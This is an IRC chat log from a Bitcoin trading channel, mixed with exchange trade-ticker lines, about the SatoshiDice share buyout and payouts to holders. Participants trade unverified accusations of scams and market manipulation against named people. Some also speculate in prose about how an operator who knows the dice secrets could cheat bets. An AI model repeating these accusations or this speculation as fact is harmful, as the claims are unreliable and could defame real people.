[BTCTC] [S.DICE-PT] 173 @ 0.00271 = 0.4688 BTC [+] Jul 18 02:27:06 [BTCTC] [S.DICE-PT] 195 @ 0.00273 = 0.5324 BTC [+] Jul 18 02:27:08 [BTCTC] [S.DICE-PT] 137 @ 0.002745 = 0.3761 BTC [+] Jul 18 02:27:10 [BTCTC] [S.DICE-PT] 75 @ 0.00275 = 0.2063 BTC [+] Jul 18 02:27:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.042768 BTC [+] Jul 18 02:27:20 [BTCTC] [S.DICE-PT] 1000 @ 0.00275 = 2.75 BTC [+] Jul 18 02:27:27 [BTCTC] [S.DICE-PT] 100 @ 0.00279 = 0.279 BTC [+] Jul 18 02:27:28 [BTCTC] [GSDPT] 1 @ 0.002585 BTC [+] Jul 18 02:27:30 [BTCTC] [S.DICE-PT] 46 @ 0.002798 = 0.1287 BTC [+] Jul 18 02:27:30 [BTCTC] [GSDPT] 30 @ 0.00272 = 0.0816 BTC [+] Jul 18 02:27:32 [BTCTC] [GSDPT] 159 @ 0.002795 = 0.4444 BTC [+] Jul 18 02:27:33 [BTCTC] [GSDPT] 45 @ 0.00289 = 0.1301 BTC [+] Jul 18 02:27:38 [BTCTC] [GSDPT] 1000 @ 0.003 = 3 BTC [+] Jul 18 02:27:39 [BTCTC] [GSDPT] 114 @ 0.00318 = 0.3625 BTC [+] Jul 18 02:27:41 [BTCTC] [S.DICE-PT] 580 @ 0.002799 = 1.6234 BTC [+] Jul 18 02:27:42 [BTCTC] [S.DICE-PT] 1000 @ 0.0028 = 2.8 BTC [+] Jul 18 02:27:52 [BTCTC] [S.DICE-PT] 80 @ 0.0028 = 0.224 BTC [+] Jul 18 02:27:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.042767 BTC [-] Jul 18 02:27:55 [BTCTC] [S.DICE-PT] 50 @ 0.00287 = 0.1435 BTC [+] Jul 18 02:27:56 [BTCTC] [S.DICE-PT] 127 @ 0.002875 = 0.3651 BTC [+] Jul 18 02:27:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.042121 = 0.2948 BTC [-] Jul 18 02:27:58 [BTCTC] [S.DICE-PT] 125 @ 0.003 = 0.375 BTC [+] Jul 18 02:27:59 [BTCTC] [S.DICE-PT] 1 @ 0.003 BTC [+] Jul 18 02:28:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.042117 = 2.1059 BTC [-] Jul 18 02:28:01 [BTCTC] [S.DICE-PT] 2 @ 0.003008 = 0.006 BTC [+] Jul 18 02:28:02 [BTCTC] [TAT.ASICMINER] 77 @ 0.042105 = 3.2421 BTC [-] Jul 18 02:28:03 [BTCTC] [S.DICE-PT] 350 @ 0.0031 = 1.085 BTC [+] Jul 18 02:28:05 [BTCTC] [S.DICE-PT] 2 @ 0.00315 = 0.0063 BTC [+] Jul 18 02:28:11 [BTCTC] [S.DICE-PT] 1000 @ 0.0032 = 3.2 BTC [+] Jul 18 02:28:27 [BTCTC] [RSM] 7 @ 0.021 = 0.147 BTC [+] Jul 18 02:28:44 Well that was interesting Jul 18 02:29:01 wut Jul 18 02:29:06 I got most of that I think... it's not much tho... Jul 18 02:29:11 of course, btct is not responding now Jul 18 02:29:19 aww nam did you gox btct ? Jul 18 02:29:27 Possibly. Jul 18 02:29:31 I got 4k Jul 18 02:30:05 Hopefully they actually pay out the .0035 Jul 18 02:30:05 still mor eon BF Jul 18 02:30:08 gogogog Jul 18 02:30:12 o Jul 18 02:30:42 I'm trying, not letting me. Jul 18 02:31:16 Work you fool Jul 18 02:31:19 hehe Jul 18 02:32:45 o cool, guy on forum kinda sensed it Jul 18 02:32:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.042767 = 0.1711 BTC [+] Jul 18 02:33:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.042768 BTC [+] Jul 18 02:33:15 [BTCTC] [S.DICE-PT] 1 @ 0.00331 BTC [+] Jul 18 02:33:16 [BTCTC] [DMS.MINING] 3 @ 0.015 = 0.045 BTC [-] Jul 18 02:33:18 [BTCTC] [S.DICE-PT] 58 @ 0.00337 = 0.1955 BTC [+] Jul 18 02:33:19 [BTCTC] [DMS.MINING] 24 @ 0.015 = 0.36 BTC [-] Jul 18 02:33:21 [BTCTC] [DMS.MINING] 30 @ 0.014809 = 0.4443 BTC [-] Jul 18 02:33:22 [BTCTC] [DMS.MINING] 1 @ 0.014802 BTC [-] Jul 18 02:33:24 [BTCTC] [DMS.MINING] 100 @ 0.0148 = 1.48 BTC [-] Jul 18 02:33:25 [BTCTC] [DMS.MINING] 23 @ 0.0148 = 0.3404 BTC [-] Jul 18 02:33:26 [BTCTC] [DMS.MINING] 50 @ 0.01475 = 0.7375 BTC [-] Jul 18 02:33:28 [BTCTC] [DMS.MINING] 40 @ 0.0147 = 0.588 BTC [-] Jul 18 02:33:28 [BTCTC] [DMS.MINING] 20 @ 0.014651 = 0.293 BTC [-] Jul 18 02:33:29 [BTCTC] [DMS.MINING] 40 @ 0.01461 = 0.5844 BTC [-] Jul 18 02:34:19 [BTCTC] [ASICMINER-PT] 1 @ 4.350002 BTC [-] Jul 18 02:34:26 ฿0.002211259782923 per share 96btc worth :) Jul 18 02:34:51 Guys will coinbr accounts be auto credited with the sdice buyout? Jul 18 02:35:36 they sold it Jul 18 02:35:54 Yeah, 0.0035 Jul 18 02:35:56 a piece Jul 18 02:36:04 stupid me sold plenty at 0.002 Jul 18 02:36:17 0.002-0.0022 Jul 18 02:36:28 and buying at 0.0017-0.002 from other PTs Jul 18 02:36:33 who is buying it? Jul 18 02:36:37 From other PTs Jul 18 02:36:50 [HAVELOCK] [SDICE] 229 @ 0.32 = 73.28 BTC [+] Jul 18 02:37:35 Chaangnoi it's a cash cow with the correct management Jul 18 02:37:50 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 18 02:38:05 [BTCTC] [AMC-PT] 500 @ 0.002491 = 1.2455 BTC [-] Jul 18 02:38:05 fuck Jul 18 02:38:12 I was going to buy the ltc pt Jul 18 02:38:19 too late too Jul 18 02:38:20 Chaangnoi are you the goat on the forum who scammed people last year with pirate? Jul 18 02:38:40 [BTCTC] [ASICMINER-PT] 1 @ 4.436 BTC [+] Jul 18 02:38:52 If they buyout holders at 0.0035 per sare, what's the problem with buying in the last weeks? Jul 18 02:39:06 [HAVELOCK] [SDSTM] 3 @ 0.01013 = 0.0304 BTC [-] Jul 18 02:39:16 To clarify, it was not sold for .0035 per share Jul 18 02:39:25 I would like to encourage all newly rich s.dice bagholders to try their luck with s.mg they have a multi room data center - launching in two weeks. Jul 18 02:39:27 it was sold for .00126315 per share Jul 18 02:39:34 but MPEX holders are getting .0035 Jul 18 02:39:35 [BTCTC] [GSDPT] 200 @ 0.0033 = 0.66 BTC [+] Jul 18 02:39:36 [BTCTC] [S.DICE-PT] 350 @ 0.0025 = 0.875 BTC [-] Jul 18 02:39:40 No, but holders will be bought out at 0.0035 Jul 18 02:40:20 [BTCTC] [AMC-PT] 58 @ 0.0025 = 0.145 BTC [+] Jul 18 02:41:20 pretty sure Erik got a much higher price for his shares months ago Jul 18 02:41:23 [BTCTC] [AMC-PT] 780 @ 0.0025 = 1.95 BTC [+] Jul 18 02:41:28 Only mpex ones namworld because Erik pumped the stock to 0.007 with fake whales Jul 18 02:41:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.042767 BTC [-] Jul 18 02:41:54 Snookers is tiberius btw Jul 18 02:42:00 dub i was just wondering Jul 18 02:42:05 for anyone wanting to update their ignores Jul 18 02:42:08 private holders get much lower than the sale price, as mpex is getting .0035 Jul 18 02:42:12 [HAVELOCK] [SDICE] 160 @ 0.32 = 51.2 BTC [+] Jul 18 02:42:16 [HAVELOCK] [SDICE] 12 @ 0.32 = 3.84 BTC [+] Jul 18 02:42:30 Well people where buying my PT massively in the 0.002-0.0022 range. Guess they're all happy campers now. Jul 18 02:42:58 wow what happened to the sdice order book ? Jul 18 02:43:09 PTs will likely get 95% Jul 18 02:43:13 [HAVELOCK] [SDICE] 7 @ 0.32 = 2.24 BTC [+] Jul 18 02:43:15 [BTCTC] [S.DICE-PT] 350 @ 0.0033 = 1.155 BTC [+] Jul 18 02:43:19 topace__: https://bitcointalk.org/index.php?topic=101902.msg2751536#msg2751536 Jul 18 02:45:43 SDICE bought out. Jul 18 02:46:46 although a gracious PT operator might not take a full 5% Jul 18 02:46:52 being that it's a buyout Jul 18 02:46:58 [HAVELOCK] [AM100] 144 @ 0.041008 = 5.9052 BTC [-] Jul 18 02:47:17 [HAVELOCK] [AM100] 97 @ 0.041009 = 3.9779 BTC [+] Jul 18 02:47:18 [HAVELOCK] [AM100] 7 @ 0.041008 = 0.2871 BTC [-] Jul 18 02:47:23 Namworld takes no fee Jul 18 02:47:29 " Should the issuer of S.DICE terminate the asset, any funds received through Jul 18 02:47:29 this asset termination will be distributed in full without any fee taken. " Jul 18 02:47:33 [HAVELOCK] [SDICE] 50 @ 0.32 = 16 BTC [+] Jul 18 02:47:34 another day another pump and dump Jul 18 02:47:40 next up feedzebirds Jul 18 02:47:53 Buyout? That's not a dividend. No fees. Jul 18 02:48:06 Topace, do you take a fee on a buyout? Jul 18 02:48:13 [HAVELOCK] [AM100] 66 @ 0.041009 = 2.7066 BTC [+] Jul 18 02:48:18 [BTCTC] [BASIC-MINING] 3 @ 0.744989 = 2.235 BTC [+] Jul 18 02:48:54 dub - please explain the logic of a pump and dump in which investors are paid back roughly what they paid at IPO plus 9 months of >20% APR dividends Jul 18 02:48:54 It only state dividends in the contract, not buyback. Jul 18 02:48:59 DeadTerra doesnt say in his contract Jul 18 02:49:02 ;;market sell 126315 Jul 18 02:49:07 A market order to sell 126315 bitcoins right now would net 8651985.2652 USD and would take the last price down to 45.1000 USD, resulting in an average price of 68.4953 USD/BTC. | Data vintage: 0.0038 seconds Jul 18 02:49:13 was a dump n pump :) Jul 18 02:49:28 you found quite a sucker there erik Jul 18 02:49:34 or Jul 18 02:49:39 a pump n dump n pump Jul 18 02:49:54 evoorhees, it's more to do with the slices that were sold much higher. It was supposed to be from private investors I think. But some think it was your shares. Jul 18 02:50:13 Namworld: shh, we just dont understand markets Jul 18 02:50:16 yes some also think I inflated all the numbers with fake whales and all manner of manipulation Jul 18 02:50:21 And the whales were you playing to then sell those slices. Jul 18 02:50:23 Aye. Jul 18 02:50:45 so my total scam prediction is now complete Jul 18 02:50:55 final step is mai tais Jul 18 02:51:00 enjoy! Jul 18 02:51:06 Gimme some of that. Jul 18 02:51:39 ... you do realize that revenue of all IPO shares (including later tranches) - cost of paying back @ .0035 means it's a wash from my perspective, don't you? Jul 18 02:51:50 what happened to railing blow off a hooker in thailand (with pirate) Jul 18 02:52:27 i'm still up for that Jul 18 02:52:35 althought i may shoot trendon if i see him Jul 18 02:53:16 only in the foot though Jul 18 02:53:19 if we're running with the pump n dump theory it's impossible to be a wash Jul 18 02:53:30 since you could have whaled as much coin as liked Jul 18 02:53:46 I think you haven't quite thought the mechanics of that through Jul 18 02:53:52 maybe Jul 18 02:53:53 evoorhees, there's just no point arguing. You should know by now. Jul 18 02:54:04 I know Jul 18 02:54:04 i'm not worried about tinfoil hatting Jul 18 02:54:05 it's over Jul 18 02:54:11 [BTCTC] [S.DICE-PT] 20 @ 0.003489 = 0.0698 BTC [+] Jul 18 02:54:32 anything juicy yet ? Jul 18 02:55:28 SD doesn't rely on having any trust in the operator of the site... that's the whole point Jul 18 02:55:45 Any chance of you reversing a few bets I made today to my detriment? ;) J/k Jul 18 02:56:01 Any chance of reversing the ones you made prior that were to mine? ;) Jul 18 02:56:37 if the new buyer doesnt IPO the site, then there's no more risk of accusations about whaling Jul 18 02:56:41 [HAVELOCK] [AM100] 2 @ 0.041659 = 0.0833 BTC [+] Jul 18 02:56:45 lol Jul 18 02:57:20 Anyway guys, in all seriousness, I hope those of you who were shareholders feel decent about the outcome. It was hell to get it. Jul 18 02:57:28 Chaang - no Jul 18 02:57:42 I need to go for now, on later Jul 18 02:57:49 nop Jul 18 02:58:18 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [+] Jul 18 02:58:32 here's an easy way of doing it Jul 18 02:58:59 sign a transaction (theres a random component to the ECDSA signing), see if it wins Jul 18 02:59:03 if doesn't win resign it Jul 18 02:59:09 he's full of shit :p Jul 18 02:59:57 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 18 03:00:23 the fact that he's lying about it, well lol Jul 18 03:00:41 Who? Jul 18 03:01:00 ChaangNoi | i thought you were able to know the key, and could figure out winning bets? Jul 18 03:01:07 evoorhees | Chaang - no Jul 18 03:01:13 demonstrably false Jul 18 03:01:51 yes Jul 18 03:02:04 Biggest fraud and liar in here is chaangnoi who helped pirate gather funds Jul 18 03:03:12 [BTCTC] [BITVPS] 33 @ 0.0018 = 0.0594 BTC [+] Jul 18 03:03:18 i like to defraud and lie Jul 18 03:03:22 if you don't believe me lets ask someone who knows wtf he's talking about (technically) Jul 18 03:03:22 No, I think what evoorhees meant was, people won't have to trust the operator because the user already know the hash of the secret and sign their own transaction. Jul 18 03:03:24 don't leave me out Jul 18 03:03:24 ping Diablo-D3 Jul 18 03:03:30 There's no trust needed for players Jul 18 03:04:01 Since ChaangNoi was commenting about if the new owner was trustable Jul 18 03:04:01 Erik didn't know the outcomes scrat Jul 18 03:04:11 It doesn't matter, new owner can't cheat player Jul 18 03:04:20 Diablod3 is a fucking toolbah Jul 18 03:04:21 The only trust required is if you're a shareholder. Jul 18 03:04:39 Toolbag why should he be speaking Jul 18 03:04:48 why would he cheat if he doesnt IPO Jul 18 03:05:03 No, he mean Evoorhees could have cheated the shareholders by making winning bets, since he knows the secret. Jul 18 03:05:08 no point in eating into your own bankroll Jul 18 03:05:18 But the new owner can't cheat Jul 18 03:05:29 Would be pointless Jul 18 03:05:30 Why would be iPod for? Sdice is a cashcow with good managers Jul 18 03:05:35 they'll probably have to release new secrets Jul 18 03:05:46 lol Jul 18 03:05:49 And it wasn't 1 buyer it was probably a group Jul 18 03:05:49 They will... Jul 18 03:05:54 Snookers you're losing it brah Jul 18 03:05:59 [08:03:24] ping Diablo-D3 Jul 18 03:06:01 what Jul 18 03:06:02 A group? Jul 18 03:06:10 Diablo-D3: scroll up Jul 18 03:06:12 It was bought for over 10 million. Jul 18 03:06:13 Plus it was smarter for voorhees to leave before he got busted Jul 18 03:06:18 tl;dr it for me Jul 18 03:06:31 A single invididual could have bought it. Jul 18 03:06:45 that erik can cheat by signing txids until they win (since he knows the secrets) Jul 18 03:06:55 [MPEX] [S.MPOE] 12900 @ 0.00088135 = 11.3694 BTC [-] Jul 18 03:07:17 Namworld they didn't and voorhees was not the only owner he was the main public shill Jul 18 03:07:51 or well, whoever is holding the secrets (someone has to upload them to the server) Jul 18 03:07:54 Scrat: I need more context. tx for what? Jul 18 03:07:59 SD Jul 18 03:08:02 oh that Jul 18 03:08:07 I think they fixed that vuln Jul 18 03:08:15 not that Jul 18 03:08:23 I mean if you know the secrets Jul 18 03:08:35 you mean ahead of time? Jul 18 03:08:37 Scrat Eric wasn't cheating get over yourself Jul 18 03:08:39 jesus fuck Jul 18 03:08:42 yes Jul 18 03:08:50 yeah, you just write a program that brute forces the tx Jul 18 03:08:52 No Erik was not. I mean the new buyer(s) Jul 18 03:08:53 and then send the working one Jul 18 03:09:05 thats what im trying to say Jul 18 03:09:15 you just need a lot of computation power for that Jul 18 03:09:26 and I dont think you can gpu this problem Jul 18 03:09:41 for the record: https://bitcointalk.org/index.php?topic=80312.msg2244347#msg2244347 Jul 18 03:09:42 Diablo-D3: wat are you for real? for a 50% you need at most 2-3 tries Jul 18 03:09:46 Namworld sdice was bought by a group it will be relaunched better Jul 18 03:09:53 Scrat: I tried it actually Jul 18 03:10:09 using known secrets (not their secrets though) Jul 18 03:10:11 eric V just screwed the pooch! Jul 18 03:10:12 its a pita Jul 18 03:10:22 using unknown secrets, its largely the same difficulty Jul 18 03:10:33 and the amount of insider trading is stupid Jul 18 03:10:39 im fucking talking about known secrets here Jul 18 03:10:47 aka the server operator Jul 18 03:10:51 but with unknown secrets you flood the network with all possible tx permutations Jul 18 03:11:00 at the same time Jul 18 03:11:11 no point in unknown secrets thats a 256 bit space, fucks sake Jul 18 03:11:17 SD will reply with a win no matter which tx makes it into the chain Jul 18 03:11:29 Scrat: yes, but the secret isnt in the 256 bit space Jul 18 03:11:41 they had a flaw in the original RNG Jul 18 03:11:50 and presumably a continuing flaw in how SD operates Jul 18 03:11:57 [BTCTC] [AMC-PT] 118 @ 0.0025 = 0.295 BTC [+] Jul 18 03:12:00 While I personally lost my ass every time I even thought about satoshi dice both as a player and investor, it has occured to me that this is a very big milestone for bitcoin. Satoshi Dice was the draw for bitcoin early on along with SR. Now we have Winklevoss and a bunch of guys still talking about how yesterday's dice site might be a scam. Jul 18 03:12:10 (which allows you to do probabilities on the next roll) Jul 18 03:12:25 Chsados everyone and their mother knows mpex was always a boiler room.. Jul 18 03:12:27 [BTCTC] [PAJKA.BOND] 7 @ 0.05 = 0.35 BTC [+] Jul 18 03:12:27 (thus allowing you to bet larger amounts during favorable conditions) Jul 18 03:12:28 tiberius: im not saying that he did. but he said that he cant which is false Jul 18 03:12:47 I'm not going to tell you how successful that was, of course. Jul 18 03:13:19 Diablo-D3 falling victim to the gamblers fallacy? lol Jul 18 03:13:25 Scrat: nope. Jul 18 03:13:37 when you can do probabilities on the next dice roll due to a broken RNG Jul 18 03:13:41 it stops being gambling Jul 18 03:13:58 the "broken rng" in question is the hmac of sha512 Jul 18 03:14:00 Will mtgox last the summer? Jul 18 03:14:03 lol u called it TAT Jul 18 03:14:08 GL even finding the slightest hint of structure in it Jul 18 03:14:20 Yeah, well. Jul 18 03:14:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.042767 = 0.2566 BTC [-] Jul 18 03:14:27 I cannot disclose if I did or did not. Jul 18 03:14:49 noaccess when you say "we have winklevoss" exactgly what do tyou mean ? Jul 18 03:15:04 btw, I dont think the winklevosses exist Jul 18 03:15:08 I am winklevoss #2 Jul 18 03:15:10 surprise! Jul 18 03:15:14 The Winklevoss dude in #bitcoin-anal? Jul 18 03:15:18 its just some fictional characters made up by the douchebag that started douchebook Jul 18 03:15:23 Aka just a random name borrower? Jul 18 03:15:49 lol facebook is a scvam and winklevoss twins are a publicity stunt to create the false impression anyone gives a shit ? Jul 18 03:15:55 i like this theory. when does it ipo ? Jul 18 03:16:07 [MPEX] [S.MPOE] 12500 @ 0.00087944 = 10.993 BTC [-] Jul 18 03:16:09 [MPEX] [S.MPOE] 3900 @ 0.00087893 = 3.4278 BTC [-] Jul 18 03:16:14 [BTCTC] [ASICMINER-PT] 1 @ 4.436999 BTC [+] Jul 18 03:16:16 SELECT * FROM insults; Jul 18 03:16:31 mircea_popescu: exactly. and it already IPO'ed =/ Jul 18 03:16:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.042129 = 0.2106 BTC [-] Jul 18 03:16:37 and it bombed accordingly Jul 18 03:16:45 facebook IPOed Jul 18 03:17:09 hah Jul 18 03:17:12 its still an IPO though Jul 18 03:17:18 and it was hilarious Jul 18 03:18:02 [BTCTC] [ASICMINER-PT] 1 @ 4.436999 BTC [+] Jul 18 03:18:30 "we have winklevoss" means that people used to talk about the possibilities afforded by bitcoin. provably fair being one. smart contracts. other stuff I read about. now it's all gimmicks. Jul 18 03:19:15 well not all. Jul 18 03:19:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.042129 = 0.1264 BTC [-] Jul 18 03:19:40 but yeah. i personally blame "the foundation", and more generally ycombinator level suck. Jul 18 03:19:43 [BTCTC] [S.DICE-PT] 1 @ 0.003101 BTC [-] Jul 18 03:19:48 oh, and please disregard my previous comment about s.mg having a data center. It was gimmicky. Jul 18 03:20:03 lol Jul 18 03:22:47 [HAVELOCK] [SDSTM] 2 @ 0.01013 = 0.0203 BTC [-] Jul 18 03:22:52 mircea_popescu - you mentioned in the s.mg prospectus something about advanced bitcoin functionality. Is that still going to happen? The question is supposed to be inspirational and rhetorical but If you have a good answer I'm interested. Jul 18 03:23:01 [BTCTC] [S.DICE-PT] 382 @ 0.00347 = 1.3255 BTC [+] Jul 18 03:23:22 [HAVELOCK] [SDSTM] 1 @ 0.01011243 BTC [-] Jul 18 03:23:24 mmm Jul 18 03:23:28 do you have a quote ? Jul 18 03:23:56 [HAVELOCK] [SDSTM] 2 @ 0.01010001 = 0.0202 BTC [-] Jul 18 03:25:03 [BTCTC] [S.DICE-PT] 50 @ 0.00347 = 0.1735 BTC [+] Jul 18 03:25:51 unfortunately no, maybe I imagined it. Jul 18 03:26:03 [MPEX] [S.MPOE] 2600 @ 0.00087893 = 2.2852 BTC [-] Jul 18 03:27:25 [BTCTC] [AMC-PT] 28 @ 0.0025 = 0.07 BTC [+] Jul 18 03:27:45 So is havelock going to bust the trades that happened on SDICE post-announcement? Jul 18 03:28:09 qxzn_, not 100% sure yet, but i don't think so Jul 18 03:28:18 there's always a risk leaving open trades on the order book Jul 18 03:28:20 any kind of news could come Jul 18 03:28:28 so the people that took advantage well, good for them Jul 18 03:28:43 [BTCTC] [ASICMINER-PT] 1 @ 4.395 BTC [-] Jul 18 03:28:43 i don't think i'll re-enable trading though Jul 18 03:30:07 man what a mess Jul 18 03:30:41 what makes it a mess? Jul 18 03:31:25 Stock exchange don't typically stop/revert trades because some people traded right after an announcement. Stock exchanges don't typically cancel orders just because of unsuspected news. Once news are public, trades will occur based on it. Jul 18 03:31:44 And price will move. Jul 18 03:33:01 That's how exchanges work. The first to react gets first dibs. People who leave orders risk their order getting filled, either their bid on bad news or their ask on good news. Jul 18 03:33:56 It's not about giving the same opportunity to everyone, it's on a first come, first served basis. Demand/offer moves the market. Jul 18 03:34:36 I'm not sure why mircea canceled the MPEx orderbook. Doesn't sound like him to interfere. Jul 18 03:35:15 [BTCTC] [ASICMINER-PT] 1 @ 4.436 BTC [+] Jul 18 03:35:17 [BTCTC] [ASICMINER-PT] 1 @ 4.439995 BTC [+] Jul 18 03:35:22 [BTCTC] [ASICMINER-PT] 9 @ 4.439996 = 39.96 BTC [+] Jul 18 03:35:28 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [+] Jul 18 03:35:30 [BTCTC] [ASICMINER-PT] 7 @ 4.446999 = 31.129 BTC [+] Jul 18 03:35:33 [BTCTC] [ASICMINER-PT] 8 @ 4.447 = 35.576 BTC [+] Jul 18 03:35:38 [BTCTC] [S.DICE-PT] 10 @ 0.003103 = 0.031 BTC [-] Jul 18 03:35:48 You have any reason for that, mircea? Jul 18 03:35:54 [HAVELOCK] [AM100] 170 @ 0.041589 = 7.0701 BTC [-] Jul 18 03:36:18 [HAVELOCK] [AM100] 58 @ 0.04159 = 2.4122 BTC [+] Jul 18 03:36:49 [HAVELOCK] [AM100] 92 @ 0.04159 = 3.8263 BTC [+] Jul 18 03:38:35 [BTCTC] [TAT.ASICMINER] 33 @ 0.042277 = 1.3951 BTC [+] Jul 18 03:38:53 Well, at least he didn't buy up all the orders himself Jul 18 03:39:04 [20:34] I'm not sure why mircea canceled the MPEx orderbook. Doesn't sound like him to interfere. <<< I agree Jul 18 03:39:27 [BTCTC] [TAT.ASICMINER] 35 @ 0.042277 = 1.4797 BTC [+] Jul 18 03:39:28 Well I find it odd anyway. Jul 18 03:39:46 [HAVELOCK] [AM100] 98 @ 0.04165999 = 4.0827 BTC [+] Jul 18 03:40:28 Ah well, at least the existing shareholders didn't get screwed Jul 18 03:40:30 [BTCTC] [TAT.ASICMINER] 6 @ 0.042277 = 0.2537 BTC [+] Jul 18 03:40:37 right. and if i had left it up, it'd be all "mp bought the shares" Jul 18 03:40:51 [BTCTC] [TAT.ASICMINER] 69 @ 0.042123 = 2.9065 BTC [-] Jul 18 03:41:45 I don't see why you should care. Jul 18 03:41:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.042122 = 0.2949 BTC [-] Jul 18 03:41:55 [HAVELOCK] [AM100] 100 @ 0.041659 = 4.1659 BTC [-] Jul 18 03:41:57 since when do you care what people think Jul 18 03:42:23 [HAVELOCK] [SDSTM] 4 @ 0.011 = 0.044 BTC [+] Jul 18 03:42:47 [HAVELOCK] [AM100] 19 @ 0.041659 = 0.7915 BTC [-] Jul 18 03:43:00 It builds a little loyalty towards the exchange to clear the books like this when something like a delisting and forced buyback is about to occur at higher than current share value Jul 18 03:43:01 [HAVELOCK] [AM100] 27 @ 0.04165999 = 1.1248 BTC [+] Jul 18 03:43:04 i suppose dealing with me or Nam asking why is much less of a PITA than the people that would have accused you of scamming Jul 18 03:43:05 however Jul 18 03:43:11 [HAVELOCK] [AM100] 5 @ 0.04166 = 0.2083 BTC [+] Jul 18 03:43:12 you coyuld have known days ago Jul 18 03:43:17 i dont care lol Jul 18 03:43:19 and been buying Jul 18 03:43:28 [BTCTC] [ASICMINER-PT] 1 @ 4.402001 BTC [-] Jul 18 03:43:38 im just pointing out that this "why x" is always an open exercise Jul 18 03:43:50 why is coca cola called coca cola Jul 18 03:44:09 because there used to be cocain in it Jul 18 03:44:22 could have been called coca copa Jul 18 03:44:28 maybe it'd havbe been better if it were Jul 18 03:44:29 etc. Jul 18 03:44:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.042277 BTC [+] Jul 18 03:45:01 [BTCTC] [TAT.ASICMINER] 22 @ 0.042277 = 0.9301 BTC [+] Jul 18 03:46:45 [HAVELOCK] [HIM] 1 @ 0.26550001 BTC [+] Jul 18 03:46:46 [HAVELOCK] [HIM] 8 @ 0.2655 = 2.124 BTC [-] Jul 18 03:47:29 [BTCTC] [S.DICE-PT] 74 @ 0.003469 = 0.2567 BTC [+] Jul 18 03:47:31 [BTCTC] [S.DICE-PT] 26 @ 0.00347 = 0.0902 BTC [+] Jul 18 03:47:40 [HAVELOCK] [SDSTM] 10 @ 0.011 = 0.11 BTC [+] Jul 18 03:47:50 [BTCTC] [AMC-PT] 89 @ 0.0025 = 0.2225 BTC [+] Jul 18 03:48:50 [BTCTC] [PAJKA.BOND] 1 @ 0.05 BTC [+] Jul 18 03:49:17 1/8th of the month's trade volume for S.Dice on MPEX was in the last 24 hours.. all to buy orders. Seems some people were expecting bad news Jul 18 03:49:18 coca because of coca leaves, cola because of caffeine from kola nut. Jul 18 03:49:40 Namworld - my bad Jul 18 03:49:47 Unless I have my bids and asks reversed.. http://coinflow.co/chart/MPEX/S.DICE Jul 18 03:49:55 [BTCTC] [GSDPT] 7 @ 0.003439 = 0.0241 BTC [+] Jul 18 03:50:17 does anyone have an opinion on Primecoin in this forum? That's the prime number finder coin? Jul 18 03:50:19 [BTCTC] [TAT.ASICMINER] 19 @ 0.042277 = 0.8033 BTC [+] Jul 18 03:50:19 Well coca leaves are what cocaine is extracted from. Jul 18 03:50:27 So technically it contained cocaine. Jul 18 03:51:03 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 18 03:51:14 noaccess notrly. another alt ? Jul 18 03:51:23 [HAVELOCK] [AM100] 84 @ 0.041668 = 3.5001 BTC [+] Jul 18 03:51:24 [HAVELOCK] [AM100] 212 @ 0.04166899 = 8.8338 BTC [+] Jul 18 03:51:26 [HAVELOCK] [AM100] 10 @ 0.04167 = 0.4167 BTC [+] Jul 18 03:51:27 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004196 = 0.0084 BTC [+] Jul 18 03:51:28 [HAVELOCK] [AM100] 20 @ 0.04168 = 0.8336 BTC [+] Jul 18 03:51:28 [HAVELOCK] [AM100] 500 @ 0.0417 = 20.85 BTC [+] Jul 18 03:51:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.042277 BTC [+] Jul 18 03:51:50 parseval i think people are a little rattled overall. we're in a recession. Jul 18 03:52:03 [BTCTC] [AMC-PT] 31 @ 0.0025 = 0.0775 BTC [+] Jul 18 03:52:47 mircea_popescu yes another alt, but one that does something good apparently. I'm trying to figure out if the proof of work algo is as good as hashing for security. Jul 18 03:53:06 not find out myself - I'm asking you guys Jul 18 03:53:08 Coca-Cola today still contain coca leaf extracts as of today I think. Jul 18 03:53:08 Yeah, true Jul 18 03:53:24 [BTCTC] [TAT.ASICMINER] 7 @ 0.042277 = 0.2959 BTC [+] Jul 18 03:53:33 [HAVELOCK] [AM100] 58 @ 0.041799 = 2.4243 BTC [+] Jul 18 03:53:34 [HAVELOCK] [AM100] 276 @ 0.0418 = 11.5368 BTC [+] Jul 18 03:53:49 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 03:54:22 [BTCTC] [AMC-PT] 16 @ 0.0025 = 0.04 BTC [+] Jul 18 03:55:12 ;;identify mircea_popescu Jul 18 03:55:12 Error: That operation cannot be done in a channel. Jul 18 03:55:18 uh wtf was it Jul 18 03:55:20 ;;ident mircea_popescu Jul 18 03:55:21 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu', is not identified. Jul 18 03:55:31 ;;eauth mircea_popescu Jul 18 03:55:31 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Jul 18 03:56:00 ;;everify freenode:#bitcoin-otc:06ea4ffdcc5ddbd1e8ada409c5e2ab3d96f85f634b308f8198a19ff2 Jul 18 03:56:01 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Jul 18 03:56:02 ;;rated kludge Jul 18 03:56:03 You have not yet rated user kludge Jul 18 03:56:24 ;;rate kludge -10 long string of scams. one of bitcoin's worst. Jul 18 03:56:24 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Jul 18 03:56:28 e noway Jul 